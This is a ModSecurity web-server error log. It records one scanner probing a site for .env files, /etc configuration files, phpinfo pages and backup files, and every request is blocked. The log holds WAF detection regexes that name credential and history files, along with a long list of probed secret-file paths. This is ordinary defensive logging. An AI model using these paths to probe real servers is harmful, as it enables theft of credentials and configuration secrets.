[Tue May 26 13:39:33.854483 2026] [security2:error] [pid 536875:tid 536908] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/development/.env"] [unique_id "ahVVPer_-FTveSGlx1HpPwAAkyA"]
[Tue May 26 13:39:33.855494 2026] [cgid:error] [pid 536875:tid 536994] [remote 45.148.10.95:51320] AH01264: stderr from /home2/whitece9/public_html/dnscfg.cgi: script not found or unable to stat
[Tue May 26 13:39:34.001162 2026] [security2:error] [pid 536875:tid 536928] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/erp/.env"] [unique_id "ahVVPur_-FTveSGlx1HpUQAA-zQ"]
[Tue May 26 13:39:34.011236 2026] [security2:error] [pid 536875:tid 536935] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/etc/apache2/apache2.conf"] [unique_id "ahVVPur_-FTveSGlx1HpUwAA1Ts"]
[Tue May 26 13:39:34.049477 2026] [security2:error] [pid 536875:tid 536932] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/etc/boto.cfg"] [unique_id "ahVVPur_-FTveSGlx1HpVAAAzzg"]
[Tue May 26 13:39:34.054045 2026] [security2:error] [pid 536875:tid 536992] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/fe/.env"] [unique_id "ahVVPur_-FTveSGlx1HpVQAAj3Q"]
[Tue May 26 13:39:34.134099 2026] [security2:error] [pid 536875:tid 536997] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/front/.env"] [unique_id "ahVVPur_-FTveSGlx1HpWgAA4nk"]
[Tue May 26 13:39:34.135817 2026] [security2:error] [pid 536875:tid 536986] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/frontend/.env"] [unique_id "ahVVPur_-FTveSGlx1HpWwAA4m4"]
[Tue May 26 13:39:34.156059 2026] [security2:error] [pid 536875:tid 536915] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/info.php"] [unique_id "ahVVPur_-FTveSGlx1HpZAAAsSc"]
[Tue May 26 13:39:34.194494 2026] [security2:error] [pid 536875:tid 536939] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/infophp.php"] [unique_id "ahVVPur_-FTveSGlx1HpZgAAxj8"]
[Tue May 26 13:39:34.198884 2026] [security2:error] [pid 536875:tid 536934] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/infos.php"] [unique_id "ahVVPur_-FTveSGlx1HpaAAA5jo"]
[Tue May 26 13:39:34.282887 2026] [security2:error] [pid 536875:tid 536946] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/laravel/.env"] [unique_id "ahVVPur_-FTveSGlx1HpawAA2EY"]
[Tue May 26 13:39:34.284081 2026] [security2:error] [pid 536875:tid 536964] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/local/.env"] [unique_id "ahVVPur_-FTveSGlx1HpbgAA2Fg"]
[Tue May 26 13:39:34.285289 2026] [security2:error] [pid 536875:tid 536949] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/lms/.env"] [unique_id "ahVVPur_-FTveSGlx1HpcAAA2Ek"]
[Tue May 26 13:39:34.292587 2026] [security2:error] [pid 536875:tid 536963] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/market/.env"] [unique_id "ahVVPur_-FTveSGlx1HpcwAAr1c"]
[Tue May 26 13:39:34.293125 2026] [security2:error] [pid 536875:tid 536952] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/marketing/.env"] [unique_id "ahVVPur_-FTveSGlx1HpdAAAr0w"]
[Tue May 26 13:39:34.295150 2026] [security2:error] [pid 536875:tid 536941] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/media/.env"] [unique_id "ahVVPur_-FTveSGlx1HpdgAAr0E"]
[Tue May 26 13:39:34.428514 2026] [security2:error] [pid 536875:tid 536988] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/new/.env"] [unique_id "ahVVPur_-FTveSGlx1HpgAAA4HA"]
[Tue May 26 13:39:34.429378 2026] [security2:error] [pid 536875:tid 536967] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/node-api/.env"] [unique_id "ahVVPur_-FTveSGlx1HpgQAA4Fs"]
[Tue May 26 13:39:34.433101 2026] [security2:error] [pid 536875:tid 536944] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/node/api/.env"] [unique_id "ahVVPur_-FTveSGlx1HpggAAm0Q"]
[Tue May 26 13:39:34.433243 2026] [security2:error] [pid 536875:tid 536969] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/nodeapi/.env"] [unique_id "ahVVPur_-FTveSGlx1HphQAAm10"]
[Tue May 26 13:39:34.433243 2026] [security2:error] [pid 536875:tid 536956] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/node/.env"] [unique_id "ahVVPur_-FTveSGlx1HpgwAAm1A"]
[Tue May 26 13:39:34.433247 2026] [security2:error] [pid 536875:tid 536983] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/node/backend/.env"] [unique_id "ahVVPur_-FTveSGlx1HphAAAm2s"]
[Tue May 26 13:39:34.435010 2026] [security2:error] [pid 536875:tid 536953] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/nodeweb/.env"] [unique_id "ahVVPur_-FTveSGlx1HphgAAm00"]
[Tue May 26 13:39:34.439150 2026] [security2:error] [pid 536875:tid 536973] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/old/.env"] [unique_id "ahVVPur_-FTveSGlx1HpigABAmE"]
[Tue May 26 13:39:34.440655 2026] [security2:error] [pid 536875:tid 536979] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/opt/.env"] [unique_id "ahVVPur_-FTveSGlx1HpjAABAmc"]
[Tue May 26 13:39:34.492762 2026] [security2:error] [pid 536875:tid 537021] [client 185.191.171.13:38690] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-27th/list/"] [unique_id "ahVVPur_-FTveSGlx1HpkQAAAJU"]
[Tue May 26 13:39:34.492840 2026] [security2:error] [pid 536875:tid 537021] [client 185.191.171.13:38690] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-27th/list/"] [unique_id "ahVVPur_-FTveSGlx1HpkQAAAJU"]
[Tue May 26 13:39:34.636605 2026] [security2:error] [pid 536875:tid 536877] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/php-info.php"] [unique_id "ahVVPur_-FTveSGlx1HpoQAAzQE"]
[Tue May 26 13:39:34.721343 2026] [security2:error] [pid 536875:tid 536876] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/php_info.php"] [unique_id "ahVVPur_-FTveSGlx1HppwAAmQA"]
[Tue May 26 13:39:34.721369 2026] [security2:error] [pid 536875:tid 536955] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/php.php"] [unique_id "ahVVPur_-FTveSGlx1HppgAAmU8"]
[Tue May 26 13:39:34.726748 2026] [security2:error] [pid 536875:tid 536883] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/phpinfo.php"] [unique_id "ahVVPur_-FTveSGlx1HpqQAA_Qc"]
[Tue May 26 13:39:34.727583 2026] [security2:error] [pid 536875:tid 536883] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/portal/.env"] [unique_id "ahVVPur_-FTveSGlx1HpqwAA_Qc"]
[Tue May 26 13:39:34.731959 2026] [security2:error] [pid 536875:tid 536980] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/prod/.env"] [unique_id "ahVVPur_-FTveSGlx1HprwAA_Wg"]
[Tue May 26 13:39:34.732309 2026] [security2:error] [pid 536875:tid 536889] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/production/.env"] [unique_id "ahVVPur_-FTveSGlx1HpsQAA_Q0"]
[Tue May 26 13:39:34.733210 2026] [security2:error] [pid 536875:tid 536891] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/product/.env"] [unique_id "ahVVPur_-FTveSGlx1HpsAAA_Q8"]
[Tue May 26 13:39:34.782132 2026] [security2:error] [pid 536875:tid 536890] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/project/.env"] [unique_id "ahVVPur_-FTveSGlx1HptwAA7g4"]
[Tue May 26 13:39:34.867043 2026] [security2:error] [pid 536875:tid 536898] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/public/.env"] [unique_id "ahVVPur_-FTveSGlx1HpuwAA2hY"]
[Tue May 26 13:39:34.867478 2026] [security2:error] [pid 536875:tid 536895] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/public-api/.env"] [unique_id "ahVVPur_-FTveSGlx1HpugAA2hM"]
[Tue May 26 13:39:34.871560 2026] [security2:error] [pid 536875:tid 536897] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/public/phpinfo.php"] [unique_id "ahVVPur_-FTveSGlx1HpvAAA9xU"]
[Tue May 26 13:39:34.873738 2026] [security2:error] [pid 536875:tid 536901] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/public_html/.env"] [unique_id "ahVVPur_-FTveSGlx1HpvgAA9xk"]
[Tue May 26 13:39:34.875833 2026] [security2:error] [pid 536875:tid 536885] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/qa/.env"] [unique_id "ahVVPur_-FTveSGlx1HpwAAA9wk"]
[Tue May 26 13:39:35.168352 2026] [security2:error] [pid 536875:tid 536919] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/s3/.env.bak"] [unique_id "ahVVP-r_-FTveSGlx1Hp4gAApSs"]
